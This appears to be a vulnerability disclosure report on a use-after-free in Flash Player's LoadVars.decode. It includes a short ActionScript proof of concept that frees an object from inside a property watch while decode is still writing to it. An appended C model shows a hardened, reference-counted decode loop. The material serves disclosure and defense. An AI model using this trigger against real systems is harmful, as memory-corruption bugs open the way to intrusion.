There is a use-after-free in LoadVars.decode. If a watch is set on the object
that the parameters are being decoded into, and the watch deletes the object,
then other methods are called on the deleted object after it is freed. A PoC is
as follows:
var lv = new LoadVars();
var f = lv.decode;                 // borrow LoadVars.decode so it can run against another object
var tf = this.createTextField("tf",1, 2, 3, 4, 5);
tf.natalie = "not test";
tf.watch("natalie", func);         // watch fires when decode assigns the "natalie" property
f.call(tf, "natalie=test&bob=1");  // decode into tf; the watch deletes tf mid-decode
trace(tf.natalie);
function func(){
trace("here");
tf.removeTextField();              // frees the object that decode is still operating on
return "test";
}
A sample swf and fla are attached. This issue was reproduced in Chrome on
64-bit Ubuntu.
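To make the failure mode concrete from the defender's side, here is an added C model (hypothetical, not Flash Player's code) of a decode loop whose per-property watch callback can drop the owner's last reference to the object being decoded into. The hardened loop holds its own reference for the duration of the decode and stops writing once the watch has released the caller's reference, instead of touching freed memory on the next key=value pair. The object layout, `decode_into` and `scenario` are assumptions made for this illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Minimal refcounted object standing in for the target of decode. */
typedef struct Obj {
    int refcount;
    int props;                       /* number of properties written so far */
    void (*watch)(struct Obj *);     /* per-property watch callback, may be NULL */
} Obj;

static void obj_retain(Obj *o) { o->refcount++; }
static void obj_release(Obj *o) { if (--o->refcount == 0) free(o); }

/* Watch that behaves like the PoC's removeTextField(): drops the owner's reference. */
static void watch_release_owner(Obj *o) { obj_release(o); }

/* Decodes "k=v&k2=v2" into o. Returns the number of pairs applied and sets
 * *alive to 0 if the watch released the caller's object during decoding.
 * Without the retain and the refcount check, the second iteration would
 * write into freed memory, which is the use-after-free described above. */
static int decode_into(Obj *o, const char *query, int *alive) {
    char buf[128];
    int applied = 0;
    snprintf(buf, sizeof buf, "%s", query);
    obj_retain(o);                   /* hardened: the loop owns a reference */
    *alive = 1;
    for (char *tok = strtok(buf, "&"); tok; tok = strtok(NULL, "&")) {
        o->props++;                  /* apply the property (value parsing elided) */
        applied++;
        if (o->watch) o->watch(o);   /* may release the owner's reference */
        if (o->refcount == 1) {      /* only our reference is left: stop writing */
            *alive = 0;
            break;
        }
    }
    obj_release(o);                  /* frees o here if the watch dropped the owner's ref */
    return applied;
}

/* Replays the report's scenario on the model: with_watch=1 mirrors the PoC. */
static int scenario(int with_watch, int *alive) {
    Obj *o = calloc(1, sizeof *o);
    o->refcount = 1;                 /* the owner's (caller's) reference */
    o->watch = with_watch ? watch_release_owner : NULL;
    int applied = decode_into(o, "natalie=test&bob=1", alive);  /* constructed input from the PoC */
    if (*alive) obj_release(o);      /* owner drops its reference when done */
    return applied;
}
```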
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Original issue reported on code.google.com by natashe...@google.com on 7 Dec 2015 at 11:01